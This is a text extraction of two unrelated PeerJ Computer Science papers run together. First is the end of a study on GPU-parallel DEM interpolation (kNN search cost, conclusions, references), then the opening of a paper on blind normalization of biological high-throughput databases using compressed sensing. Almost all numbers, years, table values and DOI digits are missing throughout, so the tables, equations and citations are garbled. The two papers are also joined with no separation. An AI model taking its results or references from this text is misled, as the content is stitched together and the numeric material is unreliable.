http://dx.doi.org/ . /peerj-cs. table proportion of the knn search time to the running time of the sequential implementations. the proportion is tknntrun × %, where tknn is the knn search time, and trun is the running time of the corresponding sequential implementations. data set original mls orthogonal mls lancaster’s mls knn rbf knn aidw knn idw knn shepard knn shepard regularly-distributed . % . % . % . % . % . % . % . % flat zone irregularly-distributed . % . % . % . % . % . % . % . % regularly-distributed . % . % . % . % . % . % . % . %rugged zone irregularly-distributed . % . % . % . % . % . % . % . % table proportion of the knn search time to the running time of the parallel implementations developed on a single gpu. the proportion is tknn trun × %, where tknn is the knn search time, and trun is the running time of the corresponding parallel implementations. data set original mls orthogonal mls lancaster’s mls knn rbf knn aidw knn idw knn shepard knn shepard regularly-distributed . % . % . % . % . % . % . % . % flat zone irregularly-distributed . % . % . % . % . % . % . % . % regularly-distributed . % . % . % . % . % . % . % . %rugged zone irregularly-distributed . % . % . % . % . % . % . % . % % of the computational time of the entire interpolation procedure for the three variations of the mls interpolation algorithm and the aidw interpolation algorithm, whereas the knn search costs less than % of the computational time for the rbf interpolation algorithm and approximately % in the other three variations of shepard’s method. it should also be noted that for the same size of data points, whether they are uniformly or nonuniformly distributed, there is no significant difference in the computational cost of the knn search; that is, the distribution pattern of data points is of weak influence on the computational efficiency of the knn search in the sequential version. as listed in table , for the parallel version developed on a single gpu, when the sizes of data points are almost the same, it would cost much more time in the knn search when the data points are nonuniformly distributed than when the data points are uniformly distributed. moreover, when the data points are nonuniformly distributed, the proportion of the knn search time to the total time is approximately % to % more than the proportion when the data points are uniformly distributed under the same conditions. on the gpu, for the same interpolation method and the same data size, the proportion of the knn search time relative to the total time when the data points are nonuniformly distributed is larger than that when the data points are uniformly distributed, and the achieved speedups are small. however, on the cpu, the proportion of knn search time when the data points are nonuniformly distributed relative to the total time is similar to that when the data points are uniformly distributed, and the achieved speedups are similar. this is because there are a large number of logical operations, such as switches in the knn search, and the gpu is inherently not as suitable for performing logical operations as the cpu. in the knn search procedure, the number of points in the search range is slightly smaller than k after determining a certain level. after the level is expanded, the number tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of points in the search range will be more than k. in this case, the k nearest neighbors should be selected and the redundant neighbors should be ignored by first sorting and then discarding. unfortunately, there are a large number of logical operations in sorting. in this procedure of sorting and discarding, when the point density is intensive in a region, the number of found nearest neighbors would be far more than the expected k, and much computational time would thus be required to sort the found neighbors. for areas with sparse data points, it takes more time to find enough k points by expanding the region level. therefore, in contrast to a uniform distribution, when the data point set is nonuniformly distributed, the knn search needs more computational time and its proportion of the total time is also greater. conclusion in this paper, we present the development of the sequential version, the parallel version on a multicore cpu, the parallel version on a many-core gpu, and the parallel version on multi-gpus for each of the eight variations of the mls, rbf, and shepard’s interpolation algorithms. we also evaluated the interpolation accuracy and computational efficiency for the above four versions of each variation when building large-scale dems. we have obtained the following observations. ( ) the distribution pattern of data points and the landscape conditions strongly influences the interpolation accuracy. the distribution pattern of data points strongly influences the interpolation efficiency, and the landscape conditions have a weak influence on the interpolation efficiency. ( ) for the same flat region, when the density of points is large, there is no obvious difference in terms of the interpolation accuracy for all interpolation methods. when the data points are uniformly distributed and the density of points is small, the order of the interpolation accuracy from high to low is: the mls interpolation algorithm, rbf, and shepard’s interpolation method. when the data points are nonuniformly distributed and the density of points is small, the order of the interpolation accuracy from high to low is: the mls interpolation algorithm, shepard’s interpolation method, and rbf. ( ) for the same rugged region, regardless of the density and distribution of the data points, the interpolation accuracy order from high to low is: the mls interpolation algorithm, rbf, and shepard’s interpolation method. when the data points are uniformly distributed, the above rules are more obvious than those when data points are nonuniformly distributed. ( ) the shepard’s interpolation method is only suitable for application in cases where the data points have smooth trends. when the data points have uniformly rugged trends, the accuracy of shepard’s interpolation method is rather unsatisfactory, especially in the case when the density of data points is small. ( ) for the same set of data points and interpolation points, the order of computational expense from high to low is: the rbf interpolation method, the mls algorithm, and shepard’s method moreover, for the same size of data points and interpolation points, the computational efficiency in the case when the data points are nonuniformly distributed is worse than when the data points are uniformly distributed. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ( ) for the same interpolation method, the impact of knn search on the computational efficiency of the cpu versions and the gpu versions is different. specifically, the percentage of the computational time of knn search relative to the computational time of the entire interpolation procedure in the cpu versions is much smaller than in the gpu versions. acknowledgements the authors would like to thank the editor and reviewers for their contributions to the paper. additional information and declarations funding this research was supported by the natural science foundation of china (grant numbers and ), and the fundamental research funds for the central universities (grant numbers , , and ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: natural science foundation of china: , . fundamental research funds for the central universities: , , . competing interests gang mei is an academic editor for peerj computer science. author contributions • jingzhi tu conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • guoxiang yang analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • pian qi analyzed the data, prepared figures and/or tables, and approved the final draft. • zengyu ding performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • gang mei conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the raw measurements are available in the supplementary files. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aguilar fj, aguera f, aguilar ma, carvajal f. . effects of terrain morphology, sam- pling density, and interpolation methods on grid dem accuracy. photogrammetric engineering and remote sensing ( ): – doi . /pers. . . . box gep, muller me. . a note on the generation of random normal deviates. annals of mathematical statistics ( ): – doi . /aoms/ . chaplot v, darboux f, bourennane h, leguedois s, silvera n, phachomphon k. . accuracy of interpolation techniques for the derivation of digital elevation models in relation to landform types and data density. geomorphology ( – ): – doi . /j.geomorph. . . . chen z, shen l, zhao y, yang c. . parallel algorithm for real-time contouring from grid dem on modern gpus. science china-technological sciences : – doi . /s - - - . cheng t. . accelerating universal kriging interpolation algorithm using cuda- enabled gpu. computers & geosciences : – doi . /j.cageo. . . . coll n, guerrieri m. . parallel constrained delaunay triangulation on the gpu. international journal of geographical information science ( ): – doi . / . . . cover t, hart p. . nearest neighbor pattern classification. information theory, ieee transactions on ( ): – doi . /tit. . . ding z, mei g, cuomo s, tian h, xu n. a. accelerating multi-dimensional inter- polation using moving least-squares on the gpu. concurrency and computation- practice & experience ( ):e doi . /cpe. . ding z, mei g, cuomo s, xu n, tian h. b. performance evaluation of gpu- accelerated spatial interpolation using radial basis functions for building ex- plicit surfaces. international journal of parallel programming ( ): – doi . /s - - - . ebdon d. . statistics in geography. nd edition. hoboken: blackwell publishing. ghandehari m, buttenfield bp, farmer cjq. . comparing the accuracy of esti- mated terrain elevations across spatial resolution. international journal of remote sensing : – doi . / . . . guan q, shi x, huang m, lai c. . a hybrid parallel cellular automata model for urban growth simulation over gpu/cpu heterogeneous architectures. international journal of geographical information science ( ): – doi . / . . . gumus k, sen a. . comparison of spatial interpolation methods and multi-layer neural networks for different point distributions on a digital elevation model. geodetski vestnik ( ): – doi . /geodetski-vestnik. . . - . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /pers. . . http://dx.doi.org/ . /aoms/ http://dx.doi.org/ . /j.geomorph. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /geodetski-vestnik. . . - http://dx.doi.org/ . /peerj-cs. khairnar hd, shingare ps, kale s, ieee. . accuracy evaluation of cartosat- dem using different interpolation techniques for pune area. in: international conference on industrial instrumentation and control. – . krige dg. . a statistical approach to some basic mine valuation problems on the witwatersrand. or ( ): – . lancaster p, salkauskas k. . surfaces generated by moving least squares methods. mathematics of computation ( ): – doi . /s - - - - . lehmer dh. . mathematical methods in large-scale computing units. in: proc. of nd symp. on large-scale digital calculating machinery, vol. . – . lei w, xiong r, ma s, liang l, ieee. . gpu based fast algorithm for tanner graph based image interpolation. in: ieee international workshop on multimedia signal processing. lu gy, wong dw. . an adaptive inverse-distance weighting spatial interpolation technique. computers and geosciences ( ): – doi . /j.cageo. . . . mallet jl. . discrete modeling for natural objects. mathematical geology ( ): – doi . /bf . mei g. . evaluating the power of gpu acceleration for idw interpolation algorithm. scientific world journal : article id doi . / / . mei g, tian h. . impact of data layouts on the efficiency of gpu-accelerated idw interpolation. springerplus ( ): doi . /s - - - . mei g, xu l, xu n. . accelerating adaptive inverse distance weighting interpola- tion algorithm on a graphics processing unit. royal society open science : – doi . /rsos. . mei g, xu n, xu l. . improving gpu-accelerated adaptive idw interpolation algo- rithm using fast knn search. springerplus : doi . /s - - - . peng x, wu q, cai y, lou l, yu y, li q. . the application of radial basis function interpolation in reactor core power distribution on-line monitoring. annals of nuclear energy : – doi . /j.anucene. . . . polat n, uysal m, toprak as. . an investigation of dem generation process based on lidar data filtering, decimation, and interpolation methods for an urban area. measurement : – doi . /j.measurement. . . . powell mjd. . restart procedures for the conjugate gradient method. mathematical programming ( ): – doi . /bf . rishikeshan ca, katiyar sk, mahesh vnv, ieee. . detailed evaluation of dem interpolation methods in gis using dgps data. in: th international con- ference on computational intelligence and communication networks. – doi . /cicn. . . shepard d. . a two-dimensional interpolation function for irregularly-spaced data. in: proceedings of the acm national conference. – doi . / . . siu-nganlam n. . spatial interpolation methods: a review. american cartographer ( ): – doi . / . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - - http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /rsos. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.anucene. . . http://dx.doi.org/ . /j.measurement. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /cicn. . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. steve jl. . linear algebra with applications. th edition. englewood cliffs: prentice hall. tan l, wan g, li f, chen x, du w. . gpu based contouring method on grid dem data. computers & geosciences : – doi . /j.cageo. . . . wang h, guan x, wu h. . a hybrid parallel spatial interpolation algorithm for massive lidar point clouds on heterogeneous cpu-gpu systems. isprs international journal of geo-information ( ): doi . /ijgi . wasza j, bauer s, hornegger j, ieee. . real-time preprocessing for dense -d range imaging on the gpu: defect interpolation, bilateral temporal averaging and guided filtering. in: ieee international conference on computer vision workshops. watson df. . computing the n-dimensional delaunay tessellation with application to voronoi polytopes. computer journal ( ): – doi . /comjnl/ . . . wu j, deng l, jeon g. . parallel constrained delaunay triangulation on the gpu. ieee transactions on industrial informatics : – doi . /tii. . . yan c, liu j, zhao g, chen c, yue t. . a high accuracy surface modeling method based on gpu accelerated multi-grid method. transactions in gis ( ): – doi . /tgis. . yan c, zhao g, yue t, chen c, liu j, li h, su n. . speeding up the high-accuracy surface modelling method with gpu. environmental earth sciences ( ): – doi . /s - - - . yin k, sun f, zhou s, zhang c. . par model sar image interpolation algorithm on gpu with cuda. iete technical review ( ): – doi . / . . . zhang g, zhu a, huang q. . a gpu-accelerated adaptive kernel density estimation approach for efficient point pattern analysis on spatial big data. international journal of geographical information science ( ): – . zhang j. . research on dem interpolation algorithm adaptability with local terrain features. in: international conference on geoinformatics. st international conference on geoinformatics. zhou g, liu x, fu s, sun z. . parallel identification and filling of depressions in raster digital elevation models. international journal of geographical information science ( ): – doi . / . . . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . /ijgi http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /tgis. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. submitted september accepted october published november corresponding author sebastian ohse, sebastian.ohse@mailbox.org academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright ohse et al. distributed under creative commons cc-by . open access blind normalization of public high- throughput databases sebastian ohse , melanie boerries , ,* and hauke busch ,* institute of molecular medicine and cell research, university of freiburg, freiburg, germany german cancer consortium (dktk), german cancer research center (dkfz), heidelberg, germany institute of medical bioinformatics and systems medicine, medical center - university of freiburg, faculty of medicine, university of freiburg, freiburg, germany institute of experimental dermatology, university of lübeck, lübeck, germany * these authors contributed equally to this work. abstract the rise of high-throughput technologies in the domain of molecular and cell biology, as well as medicine, has generated an unprecedented amount of quantitative high- dimensional data. public databases at present make a wealth of this data available, but appropriate normalization is critical for meaningful analyses integrating different experiments and technologies. without such normalization, meta-analyses can be difficult to perform and the potential to address shortcomings in experimental designs, such as inadequate replicates or controls with public data, is limited. because of a lack of quantitative standards and insufficient annotation, large scale normalization across entire databases is currently limited to approaches that demand ad hoc assumptions about noise sources and the biological signal. by leveraging detectable redundancies in public databases, such as related samples and features, we show that blind normalization without constraints on noise sources and the biological signal is possible. the inherent recovery of confounding factors is formulated in the theoretical framework of com- pressed sensing and employs efficient optimization on manifolds. as public databases increase in size and offer more detectable redundancies, the proposed approach is able to scale to more complex confounding factors. in addition, the approach accounts for missing values and can incorporate spike-in controls. our work presents a systematic approach to the blind normalization of public high-throughput databases. subjects bioinformatics, data mining and machine learning keywords blind normalization, high-throughput data, compressed sensing, confounding factors introduction in the current age of biological science an unprecedented amount of quantitative high-dimensional data has been acquired and needs to be analyzed. in particular, high-throughput technologies in the domain of molecular and cell biology, as well as medicine, have led to a rise in the quantification of biological molecules that underlie fundamental cellular processes, such as gene expression, metabolic flux and protein signaling (see fig. a). these fundamental processes as a whole orchestrate and underpin the dynamics of the cell (joyce & palsson, ). most of the acquired high-throughput data and particularly transcriptome data is submitted to public databases for re-analysis and how to cite this article ohse s, boerries m, busch h. . blind normalization of public high-throughput databases. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:sebastian.ohse@mailbox.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. a b figure the rise of high-throughput technologies and associated normalization methods. (a) sub- missions of rna are based on ncbi’s gene expression omnibus (barrett et al., ), protein on ebi’s pride database (vizcaíno et al., ) and metabolite on ebi’s metabolights database (haug et al., ). notably, actual samples available are approximately an order of magnitude larger than the number of sub- missions. (b) overview of common normalization methods from unsupervised to supervised learning. full-size doi: . /peerjcs. /fig- reuse in research. hence, researchers increasingly rely on samples from public databases to address shortcomings in experimental design, such as insufficient randomization or missing replicates. in addition, high-throughput data based meta-analyses are best performed with a large number of samples, such as across entire databases and different measurement technologies, in order to obtain insights applicable beyond a specific experimental setting. thus, the development of data integration techniques is increasingly important. however, significant challenges remain. the overarching problem for data integration is that of normalization, which is becoming more apparent and limiting as the need for reuse and re-analysis of high-throughput data increases. normalization involves the attenuation of bias resulting from confounding factors affecting the measurement process. technical bias of an instrument or sample preparation procedure can be addressed by measuring identically processed quantitative standards. use of such standards is widespread in serial technologies. the further up- stream in the measurement process quantitative standards are introduced, the more potential sources of bias can be accounted for. biological bias due to non-identical cells or organisms is often addressed instead by randomization (montgomery, ). this later approach presupposes that the contrast of interest and potential bias sources are known. an overview of potential bias sources with a focus on high-throughput technologies is given by lazar et al. ( ). high-throughput technologies are challenging to normalize especially because the bias of biological molecules measured in parallel is not independent. such non-independent bias stems from molecular interactions throughout the measurement process, including sample preparation procedures and instrument settings that are dependent on the measured sample itself and its biological ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. signal. quantitative measurement standards must therefore effectively cover a vast number of possible combinations of potential signal measured. in addition, measurement process or instrument components are sometimes one-time-use, such as in the case of microarray technologies, making appropriate normalization with measurement standards unfeasible. in part for these reasons, high-throughput technologies have been designed with a focus on relative comparisons, such as fold changes, rather than absolute quantification. while a limited number of spike-in standards can account for some technical bias (lovén et al., ) sample preparation procedures that are important sources of bias, such as library preparation, protein extraction or metabolic labeling, generally happen up-stream of spike-in addition. bias attenuation by randomization is not generally possible, as contrasts of interest are not initially known in the exploratory analyses typically performed with high-throughput technologies. the initial experimental design establishes how quantitative measurement standards or randomization are employed in a particular experiment. however, in the case of experiments that draw on samples from public databases, the attenuation of bias must be done post hoc. attempts at such normalization have produced different methods across the spectrum of unsupervised to supervised learning (see fig. b). unsupervised approaches generally make use of ad hoc assumptions about noise sources or the biological signal, which are then leveraged in an attempt to average out bias. while early methods were concerned with simple centering and scaling (cheadle et al., ), more recent approaches assume that an appropriate scaling is obtained by scaling across features, such as through variance stabilization (huber et al., ), or by scaling across samples, such as through quantile normalization (bolstad et al., ; irizarry et al., ). the later approach is widely used but requires the assumption that the overall biological signal does not vary significantly between samples. another major drawback is that unsupervised approaches fail to exploit the wealth of information available in public high-throughput databases. semi-supervised approaches implicitly or explicitly exploit additional data to learn parameters that can then be transferred to the dataset at hand. in particular, frozen sva (parker, corrada bravo & leek, ), frozen rma (mccall et al., ) and the gene expression commons (seita et al., ) take such an approach. the later methods aim to adjust the weight and scale parameters of the measured features based on global distributions obtained by the use of additional data. however, the frozen sva method requires prior knowledge of the contrast of interest for the additional data to be of use and is therefore impractical in the case of exploratory analyses. the frozen rma approach is based on quantile normalization and thus makes equally restrictive assumptions about the biological signal. supervised approaches make use of replicate samples or prior knowledge of potential confounding factors and contrasts of interest. if the contrast of interest has replicate samples overlapping with known confounding factors, these replicates can subsequently be used to remove bias; for example, through simple centering (li & wong, ) or more complex non-linear adjustments (benito et al., ). in the case of small sample sizes, the popular empirical bayes method combat (johnson, li & rabinovic, ) can be applied. ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. however, any supervised methods is unable to detect and remove bias outside of a setting that includes replicate samples specifically designed to limit known confounding factors, or alternatively, prior knowledge of the contrast of interest. unfortunately, as annotation of high-throughput data with respect to sample information and the experimental protocol used is often insufficient and too incoherent for machine processing, supervised approaches to normalization are generally unfeasible for public databases. the blind compressive normalization algorithm developed here makes use of the sparsity assumption combined with the identification and use of detectable redundancies in high-throughput databases to normalize for unknown confounding factors. the sparsity assumption is the well motivated assumption that signals of interest generally lie on low dimensional manifolds (hastie, tibshirani & wainwright, ). in the framework of compressed sensing it enables blind recovery of bias and subsequent normalization of high-throughput databases from merely estimated redundancies, such as correlations in that data. compressed sensing is a recent field that studies the ability to accurately reconstruct signals of interested based on very few measurements (below the nyquist sampling rate) (candès & wakin, ). we sidestep more restrictive assumptions on the biological signal or noise sources common in unsupervised normalization approaches and do not require prior knowledge of the contrast of interest or appropriate sample annotation as required for supervised normalization approaches. for the biological or medical researcher working with high-throughput data this means that when blind compressive normalization can be successfully applied to a database that includes their samples of interest, these samples are subsequently more comparable to each other and overall to other samples in the database, as bias stemming from unknown confounding factors is attenuated. methods the challenge of normalizing large high-throughput databases is distinct from the traditional p � n problem (friedman, hastie & tibshirani, ) often encountered in high-throughput data normalization. the number of features (p) and the number of samples (n) in public high-throughput databases is currently large and on the same order of magnitude (p ≈ n). therefore, computational scalability becomes an important consideration. recent advances in the field of machine learning, based on the sparsity assumption, have shown that limited sampling of high-dimensional data is often sufficient for efficient signal recovery. for example, in the area of collaborative filtering, large low-rank matrices are routinely recovered from a small number of sampled entries (mazumder, hastie & tibshirani, ; jain, netrapalli & sanghavi, ; vandereycken, ). if confounding factors in high-throughput databases are equally amenable to the sparsity assumption, bias due to the measurement process may be recoverable from a relatively small number of measured quantitative standards. since such standards are not available or feasible to obtain post hoc, we propose instead to utilize database wide redundancies to obtain the necessary constraints that enable bias recovery and subsequent normalization. our approach begins with the assumption that there are a limited number of confounding factors that markedly affect the measurement process. thus, the bias is ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure blind recovery of bias. a database consisting of features, such as measurements of rna, pro- tein or metabolite and samples, such as different cell types under various stimuli, is observed. recovery of the underlying bias (purple) is feasible if some redundant underlying signal (orange) exists that is incoher- ent to the bias and partially detectable by observation (red). redundancies can be categorized as detectable and as weak or strong based on the correlation strength between features or samples. the more redundant a signal is the closer it falls on the perfect correlation line. full-size doi: . /peerjcs. /fig- modeled as a low-dimensional manifold that takes the form of low-rank matrix (see fig. ) denoted as x. this is a flexible model which can approximate arbitrarily close any underlying bias. opposed to traditional signal recovery approaches, we specifically model the bias (systematic noise) instead of the potentially complex signal. in the framework of compressed sensing the respective matrix recovery problem resulting in the recovery of x, is defined as follows (tan et al., ). definition given a linear operator a :rn×m →rp, let y=a(x)+� be a set of p measurements of an unknown rank r̂ matrix x∈rn×m and noise �. matrix recovery solves the problem of minx ∥∥y−a(x)∥∥ subject to rank(x)≤r, where p�nm and r ≥ r̂. ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the specific type of linear operator used depends on the context and is commonly defined as the frobenius inner product of x and sensing matrices {ai ∈rn×m}i= ,...,p such that yi= ∑n j= ∑m k= (ai)jkxjk. in the general case of dense sensing, for which various recovery guarantees have been established (candes & plan, ), sensing matrices ai are defined ∀j ∈{ ,...,n} and ∀k ∈{ ,...,m} as (ai)jk ∼n . however, this approach at bias recovery presupposes a measurement setup that provides constraints (e.g., prior information) about ai and yi to recover x according to definition . such prior information is typically not available, but we show that it can be indirectly obtained from an approximation of the redundancies that commonly exists in high-throughput databases (see ‘blind recovery’). but first, before focusing on the case of blind recovery, we introduce the intermediate case of k-sparse recovery of which blind recovery is an extension. k-sparse recovery several modifications to the traditional approach of matrix recovery through dense sensing exist, including row and column only or rank- based sensing matrices (wagner & zuk, ; cai & zhang, ; zhong, jain & dhillon, ). the common case of entry sensing can be seen as a special case of dense sensing (candes & plan, ) that requires additional assumptions for guaranteed recovery and knowledge of specific entries of x. it is the simplest form of k-sparse recovery, where each sensing matrix is -sparse (contains only one nonzero entry). if sufficient quantitative standards or spike-ins were available to obtain estimates at specific nonzero entries �(s ,t ) of x from high-throughput databases, then post hoc bias recovery through entry sensing would be possible, with s ∼uniform({ ,...,n}), t ∼uniform({ ,...,m}) and yi =xs t . in this case the -sparse sensing matrices ai are defined as: (ai)jk { ∼ if(j,k)=(s ,t ) = otherwise ( ) the next level of complexity of k-sparse recovery is a -sparse sensing matrix based approach, with entries �(s ,t )(s ,t ) chosen uniformly at random as before and (s ,t ) =(s ,t ). in this case the -sparse sensing matrices ai are defined as: (ai)jk { ∼n if(j,k)∈{(s ,t ),(s ,t )} = otherwise ( ) analogously as for the dense sensing approach, k-sparse recovery presupposes a measurement setup that provides prior information about ai and yi to recover x. it differs from dense sensing by the random sparsification of measurement operators (see eq. ( )). we use k-sparse recovery as an intermediate step to blind recovery, where inaccuracies due to the additional estimation step of blind recovery are controlled for in order to allow simple evaluation (see ‘results’). blind recovery in blind recovery we show how to estimate the necessary constraints (e.g., prior information) about ai and yi from the observed signal o (see fig. ). the -sparse ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure measurement inference process from detected redundancies to bias constraints required for recovery. in feature space a redundancy is detected. a sample b allows the characterization of d and slope σ σ . the corresponding bias constraint based on b is denoted in this new feature space, where d character- izes the offset from the origin. all bias estimates are constrained by the given curve (purple). full-size doi: . /peerjcs. /fig- sensing matrices ai and respective measurements yi are defined as: (ai)jk   = σ̂(os ∗) if(j,k)=(s ,x) = σ̂(os ∗) if(j,k)=(s ,x) = otherwise ( ) yi= σ̂(os ∗)ds −σ̂(os ∗)ds ( ) where σ̂(os ∗) and σ̂(os ∗) are estimates of the standard deviation of the corresponding rows os ∗ and os ∗ of the observed signal, respectively. specifically, the values for entries �(s ,x)(s ,x) of -sparse sensing matrices ai are determined by redundancy information, such as correlations between features and samples, which must be estimated from o. furthermore, [ds ,ds ] is the orthogonal vector from point (os x,os x) to the line crossing the origin with slope σ̂(os ∗)/σ̂(os ∗) in the space of rows os ∗ and os ∗ (see fig. ). thus, yi can be reconstructed from relative constraints encoded in the correlations of o. without specifying an absolute value for a specific entry, but by specifying a correlation between two particular features, the bias is constrained by the line which goes through point (os x,os x), given that the observed matrix is centered. since redundancies not only exist for features but also samples, the transpose of the observed signal ot and its corresponding matrix entries �t(sa,v)(sb,v) are used equivalently. thus, while s /sa and s /sb specify a correlated pair of rows/columns, x/v specifies a particular observation in the space of that correlated pair (see fig. ). with linear operator a, bias x and measurements y defined accordingly, the standard matrix recovery problem given in definition is then solved by riemannian optimization (vandereycken, ), specifically with the pymanopt implementation (townsend, koep & weichwald, ). ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. simulation we conduct a series of simulations to empirically evaluate the performance and robustness of the k-sparse recovery and blind recovery approaches. to this end a synthetic high- throughput database is generated (see data availability) by combining an underlying redundant signal s with a known low-rank bias x to be recovered. we generate the redundant signal s from a matrix normal distribution. this is a common model for high- throughput data (allen & tibshirani, ). specifically, s∼mn n×p(m,aat,bt b), where m denotes the mean matrix and both aat and bt b denote the covariance matrices describing the redundancies in feature and sample space, respectively. sampling is performed by drawing from a multivariate normal distribution n∼mn n×p( ,i,i) and transforming according to s=m+anb. importantly, different features and samples have different standard deviations, which are used in the construction of the covariance matrices (in combination with random binary block structured correlation matrices). ideally, the standard deviations follow a sub-gaussian distribution (candès & wakin, ). missing values are modeled according to missing at random (mar) or missing not at random (mnar) scenarios. the bias to be recovered is modeled as a random low-rank matrix x=u vt with generated from diag(σ ,...,σm). eigenvalues are denoted as σ and are sampled from uniform( , ). matrix rank is denoted by m. eigenvectors u and v are obtained from stiefel manifolds generated by the qr decomposition of a random normal matrix (townsend, koep & weichwald, ). both redundant signal s and low-rank bias x are combined additively to yield the observed signal matrix o=x+s. the signal-to-noise ratio is kept approximately constant across bias matrices of different rank by scaling the eigenvalues of x to an appropriate noise amplitude. results recovery performance our performance evaluation starts with the case of k-sparse recovery shown in figs. a– c and derived in ‘k-sparse recovery’. in our setup, the difference in measurement operator construction between sparse and dense sensing has little effect on the performance. initial differences levels off rapidly as shown in fig. a. notably, in fig. a we observe no significant difference in performance between a -sparse and -sparse measurement operator. the storage requirements for the dense sensing variant become prohibitive quickly (cai & zhang, ) and therefore we do not simulate above -sparse measurement operators. in fig. b we highlight the advantageous scaling behavior of the -sparse approach. this allows reconstruction of bias from a small percentage of potential measurements of large high-throughput databases. therefore, for databases on the order of tens of thousands of features and samples, only a small fraction of correlations need to be considered in order to reconstruct the low-dimensional model of the bias x. thus, when estimating correlations and corresponding standard deviations from the data in the case of blind recovery, high-specificity and low-sensitivity estimators can be used; as high-sensitivity is not required with an overabundance of measurements and the focus can be placed on high-specificity instead. the non-perfect recovery in the top right of ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure performance of -sparse and blind recovery. (a) decreasing the sparsity of the measurement operator from to -sparse shows a leveling-off effect (rank- , × ). (b) scalability of -sparse re- covery overlaid with model o(c r(n + m)) (wei et al., ) (white dashed line). the larger the high- throughput database the more likely is reconstruction of more complex noise structures from a small per- centage of measurements (rank- ). (c, d) evaluation of the proof-of-concept for the -sparse case and blind recovery of bias with increasing noise complexity ( × ). full-size doi: . /peerjcs. /fig- fig. b is likely due to convergence failure of the conjugate gradient optimizer, because of a heavily overdetermined recovery setting. it can can be ameliorated by decreasing the number of considered measurements. in fig. c the performance is shown for increasingly complex bias from rank- to rank- . the necessary measurements required for improved recovery in the case of a worst-case correlation structure (e.g., maximally , possible measurements) are feasible to obtain up to a noise complexity of rank- . in the best-case scenario (e.g., maximally , possible measurements) measurements are feasible to ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. obtain up to at least rank- . notably, recovery is performed for matrix dimensions of × and thus the scaling behavior observed in fig. b may improve performance depending on the size of the database considered. in fig. d we evaluate blind recovery performance, where as opposed to k-sparse recovery with -sparse sensing matrices, entries are not sampled from a gaussian distribution, but constructed post hoc from known or estimated correlations. for purposes of comparison with the k-sparse recovery based on -sparse sensing matrices, we force accurate estimation of correlations and corresponding standard deviations. no significant difference in performance between blind and -sparse recovery are observed for this setup, as shown in figs. c– d. thus, recovery is feasible when the redundancies obtained in feature and sample space are estimated accurately and are sufficiently incoherent with the low-rank bias x. discrepancies in perfect recovery between the bottom left of figs. d and c are likely due to constraints in the construction of the measurement operator; only full rows and columns are considered for blind recovery in fig. d, which for matrix dimensions of × create measurement increments of step size . notably, these do not overlap exactly with the more fine grained scale of k-sparse recovery. recovery robustness we continue our evaluation of blind recovery in figs. a and d with a focus on recovery robustness. in particular, we observe that for the case of non-ideal redundancies, blind bias recovery is still feasible, as shown in fig. a. accordingly, as the redundant signal increases from weak redundancies (ρ= . ) to strong redundancies (ρ= . ) fewer measurements are necessary to blindly recover an unknown bias matrix (see fig. a). thus, blind recovery is somewhat robust to imperfect redundancies likely found in actual high-throughput databases. in fig. c we observe that lower accuracy in the form of falsely estimated redundancies (e.g., wrong 